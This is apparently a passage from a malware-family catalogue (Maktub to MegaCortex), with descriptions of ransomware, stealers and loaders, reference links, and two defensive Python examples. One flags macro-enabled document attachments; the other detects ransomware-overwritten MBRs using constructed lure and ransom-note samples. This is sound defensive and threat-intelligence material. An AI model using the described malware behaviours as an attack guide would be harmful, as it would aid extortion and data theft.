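    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_samples() -> dict:
    """Constructed: a macro-enabled .docm and a plain .docx, each zipped."""
    common = {
        "[Content_Types].xml": b"<Types/>",
        "word/document.xml": b"<w:document/>",
    }
    # Minimal stand-in for a VBA project stream (OLE magic + filler).
    with_vba = dict(common, **{"word/vbaProject.bin": b"\xd0\xcf\x11\xe0 stub"})
    return {
        "lure.zip": _zip_of({"Invoice_2016.docm": _zip_of(with_vba)}),
        "benign.zip": _zip_of({"Agenda.docx": _zip_of(common)}),
    }


SAMPLES = build_samples()

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        recs = inspect_zip_attachment(blob)
        print(label, "quarantine" if should_quarantine(recs) else "pass", recs)
```

Only OOXML packages are inspected here; a legacy binary `.doc` or an RTF needs an OLE/RTF parser (for example the `olevba` tool from oletools) rather than the zip check above.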

The tag is: misp-galaxy:malpedia="Maktub"

Maktub is also known as:

Table 3952. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub

https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/

MalumPOS

The tag is: misp-galaxy:malpedia="MalumPOS"

MalumPOS is also known as:

Table 3953. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos

http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf

Mamba

According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos. After successful infiltration, Mamba encrypts stored files and appends filenames with the ".mamba" extension plus the victim’s unique ID and developer’s email address.

The tag is: misp-galaxy:malpedia="Mamba"

Mamba is also known as:

  • DiskCryptor

  • HDDCryptor

Table 3954. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba

https://securelist.com/the-return-of-mamba-ransomware/79403/

https://www.ic3.gov/Media/News/2021/210323.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/

https://www.youtube.com/watch?v=LUxOcpIRxmg

Manifestus

The tag is: misp-galaxy:malpedia="Manifestus"

Manifestus is also known as:

Table 3958. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware

https://twitter.com/struppigel/status/811587154983981056

Manjusaka (Windows)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

The tag is: misp-galaxy:malpedia="Manjusaka (Windows)"

Manjusaka (Windows) is also known as:

Table 3960. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka

https://github.com/avast/ioc/tree/master/Manjusaka

https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

Maoloa

Ransomware family closely related to GlobeImposter, notable for its use of the SHACAL-2 block cipher.

The tag is: misp-galaxy:malpedia="Maoloa"

Maoloa is also known as:

Table 3961. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa

https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html

https://www.sangfor.com/blog/cybersecurity/alert-new-globeimposter-olympian-gods-20-coming

https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/

Marap

Marap is a downloader, named after its command and control (C&C) phone home parameter "param" spelled backwards. It is written in C and contains a few notable anti-analysis features.

The tag is: misp-galaxy:malpedia="Marap"

Marap is also known as:

Table 3963. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.marap

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

MarkiRAT

The tag is: misp-galaxy:malpedia="MarkiRAT"

MarkiRAT is also known as:

Table 3965. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.markirat

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

MarraCrypt

The tag is: misp-galaxy:malpedia="MarraCrypt"

MarraCrypt is also known as:

Table 3966. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.marracrypt

https://securitynews.sonicwall.com/xmlpost/marracrypt-ransomware-actively-spreading-in-the-wild/

Mars

Ransomware written in Delphi.

The tag is: misp-galaxy:malpedia="Mars"

Mars is also known as:

  • MarsDecrypt

Table 3967. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mars

https://id-ransomware.blogspot.com/2020/10/mars-ransomware.html

Mars Stealer

3xp0rt describes Mars Stealer as an improved successor of Oski Stealer, supporting stealing from current browsers and targeting crypto currencies and 2FA plugins.

The tag is: misp-galaxy:malpedia="Mars Stealer"

Mars Stealer is also known as:

Table 3968. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer

https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer

https://x-junior.github.io/malware%20analysis/MarsStealer/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer

https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/

https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468

https://ke-la.com/information-stealers-a-new-landscape/

https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/

https://3xp0rt.com/posts/mars-stealer

https://threatmon.io/mars-stealer-malware-analysis-threatmon/

https://isc.sans.edu/diary/rss/28468

https://cert.gov.ua/article/38606

https://blog.morphisec.com/threat-research-mars-stealer

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://blog.sekoia.io/mars-a-red-hot-information-stealer/

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://cyberint.com/blog/research/mars-stealer/

Masad Stealer

The tag is: misp-galaxy:malpedia="Masad Stealer"

Masad Stealer is also known as:

Table 3969. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.masad_stealer

https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram

Matanbuchus

According to PCrisk, Matanbuchus is a loader offered by its developers as Malware-as-a-Service (MaaS); its purpose is to start chain infections by delivering further malware.

Because it is sold as MaaS, both the payloads it delivers and the goals of an attack vary with the criminals operating it. Matanbuchus has been observed in attacks against US universities and high schools, as well as a Belgian high-tech organization.

The tag is: misp-galaxy:malpedia="Matanbuchus"

Matanbuchus is also known as:

Table 3971. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/

https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a

https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html

https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/

https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

https://isc.sans.edu/diary/rss/28752

https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/

Matiex

Matiex is a keylogger sold on underground forums. Its popularity there is attributed to ease of use, competitive pricing and responsive support, and it is also offered as Malware-as-a-Service (MaaS).

The tag is: misp-galaxy:malpedia="Matiex"

Matiex is also known as:

Table 3972. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matiex

https://labs.k7computing.com/index.php/matiex-on-sale-underground/

Matrix Banker

The tag is: misp-galaxy:malpedia="Matrix Banker"

Matrix Banker is also known as:

Table 3973. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker

https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/

Matrix Ransom

Matrix is a ransomware that encrypts a victim’s files and demands a ransom in cryptocurrency to decrypt them. It is distributed through phishing emails, hacking toolkits, and software downloaders. Matrix is a serious threat and can cause significant damage to a victim’s data.

The tag is: misp-galaxy:malpedia="Matrix Ransom"

Matrix Ransom is also known as:

Table 3974. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom

https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf

https://unit42.paloaltonetworks.com/matrix-ransomware/

https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf

https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/

Matsnu

The tag is: misp-galaxy:malpedia="Matsnu"

Matsnu is also known as:

Table 3976. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu

https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf

Maxtrilha

Banking trojan written in Delphi, targeting customers of European and South American banks.

The tag is: misp-galaxy:malpedia="Maxtrilha"

Maxtrilha is also known as:

Table 3979. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maxtrilha

https://seguranca-informatica.pt/the-new-maxtrilha-trojan-is-being-disseminated-and-targeting-several-banks/

Maze

Maze ransomware encrypts files and makes them inaccessible, adding a custom extension that contains part of the victim ID. The ransom note is dropped as both a text file and an .htm file. The extensions appended to files vary and are randomly generated.

Actors are known to exfiltrate data from the network for further extortion. Maze spreads mainly through email spam and various exploit kits (Spelevo, Fallout).

The Maze code is heavily obfuscated, which helps it evade security solutions that rely on signature-based detection.

The tag is: misp-galaxy:malpedia="Maze"

Maze is also known as:

  • ChaCha

Table 3980. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maze

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md

https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/

https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.secureworks.com/research/threat-profiles/gold-village

https://securelist.com/targeted-ransomware-encrypting-data/99255/

https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/

https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/

https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf

https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/

https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html

https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update

https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/

https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/

https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.docdroid.net/dUpPY5s/maze.pdf

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U

https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/

https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html

https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html

https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

http://www.secureworks.com/research/threat-profiles/gold-village

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/

https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/

https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://oag.ca.gov/system/files/Letter%204.pdf

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/

https://securelist.com/maze-ransomware/99137/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/

https://adversary.crowdstrike.com/adversary/twisted-spider/

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://sites.temple.edu/care/ci-rw-attacks/

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f

https://twitter.com/certbund/status/1192756294307995655

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

MBR Locker

Ransomware overwriting the system’s MBR, making it impossible to boot into Windows.
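An overwritten MBR is usually obvious at boot time but easy to confirm from a disk image, and a responder wants a structural check rather than a visual one. The following Python is an added example, not from the page or the dissectingmalwa.re analysis linked below: it parses a raw 512-byte MBR (446 bytes of boot code, four 16-byte partition entries, the 0x55AA signature) and reports the signs that ransomware has replaced it, namely a missing signature, an emptied or invalid partition table, boot code that no longer matches a known-good hash and, as a heuristic only, a long printable string where boot code should be, since MBR lockers commonly embed their ransom text there. Both sample sectors are constructed here and are not taken from a real infection; the "known-good" baseline is simply the hash of the constructed clean sector, and the printable-run threshold is an assumed value.

```python
"""Check a raw 512-byte MBR for signs that ransomware has overwritten it.

Added example: the sample sectors below are constructed, not captured
from a real MBR Locker infection.
"""
import hashlib
import struct
from typing import List, Optional

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446            # bytes 0..445 hold the boot loader code
PART_TABLE_OFF = 446           # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510..511
PRINTABLE_RUN_THRESHOLD = 32   # assumed heuristic: boot code rarely has long text


def parse_mbr(sector: bytes) -> dict:
    """Split an MBR into boot-code hash, partition entries and signature check."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + i * 16
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack(
            "<B3sB3sII", sector[off:off + 16])
        partitions.append(
            {"status": status, "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
    }


def longest_printable_run(data: bytes) -> int:
    """Length of the longest run of printable ASCII (0x20..0x7e)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if 0x20 <= b <= 0x7E else 0
        best = max(best, cur)
    return best


def assess_mbr(sector: bytes, baseline_boot_sha256: Optional[str] = None) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if any(p["status"] not in (0x00, 0x80) for p in info["partitions"]):
        findings.append("invalid partition status byte")
    if all(p["type"] == 0 for p in info["partitions"]):
        findings.append("partition table empty")
    if baseline_boot_sha256 and info["boot_code_sha256"] != baseline_boot_sha256:
        findings.append("boot code differs from known-good baseline")
    if longest_printable_run(sector[:BOOT_CODE_LEN]) >= PRINTABLE_RUN_THRESHOLD:
        findings.append("long printable string in boot code (possible ransom text)")
    return findings


def _partition_entry(status: int, ptype: int, lba: int, count: int) -> bytes:
    return struct.pack("<B3sB3sII", status, b"\x00\x00\x00", ptype,
                       b"\x00\x00\x00", lba, count)


def build_clean_mbr() -> bytes:
    """Constructed clean sector: a tiny boot stub and one NTFS-type partition."""
    boot = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c\xfb".ljust(BOOT_CODE_LEN, b"\x90")
    table = _partition_entry(0x80, 0x07, 2048, 204800) + b"\x00" * 48
    return boot + table + BOOT_SIGNATURE


def build_locked_mbr() -> bytes:
    """Constructed overwritten sector: ransom text in place of boot code,
    partition table zeroed, signature left intact so the BIOS still runs it."""
    note = b"YOUR DISK IS ENCRYPTED. CONTACT US TO RECOVER YOUR FILES."
    return note.ljust(BOOT_CODE_LEN, b"\x00") + b"\x00" * 64 + BOOT_SIGNATURE


CLEAN_MBR = build_clean_mbr()
LOCKED_MBR = build_locked_mbr()
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]

if __name__ == "__main__":
    for label, sector in (("clean", CLEAN_MBR), ("locked", LOCKED_MBR)):
        print(label, assess_mbr(sector, BASELINE) or ["no findings"])
```

On a real case the sector comes from `dd if=/dev/sdX bs=512 count=1` or from the first 512 bytes of a forensic image, and the baseline hash from a known-good machine of the same build; a GPT disk still carries a protective MBR with a single type 0xEE entry, so "partition table empty" remains meaningful there too.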

The tag is: misp-galaxy:malpedia="MBR Locker"

MBR Locker is also known as:

Table 3982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker

https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html

Medre

The tag is: misp-galaxy:malpedia="Medre"

Medre is also known as:

Table 3985. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.medre

http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html

MedusaLocker

A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.

The tag is: misp-galaxy:malpedia="MedusaLocker"

MedusaLocker is also known as:

  • AKO Doxware

  • AKO Ransomware

  • MedusaReborn

Table 3987. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://asec.ahnlab.com/en/48940/

https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-181a

https://twitter.com/siri_urz/status/1215194488714346496?s=20

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/

https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/

https://www.cybereason.com/blog/medusalocker-ransomware

https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf

https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html

http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://blog.talosintelligence.com/2020/04/medusalocker.html

https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/

https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/

MegaCortex

MegaCortex is ransomware used in targeted attacks against corporations. Once run, it tries to stop security-related services and then starts its own encryption routine, adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is delivered by downloaders and trojans and has no propagation capability of its own.

The tag is: misp-galaxy:malpedia="MegaCortex"

MegaCortex is also known as:

Table 3989. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://blog.malwarebytes.com/detections/ransom-megacortex/

https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://threatpost.com/megacortex-ransomware-mass-distribution/146933/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries

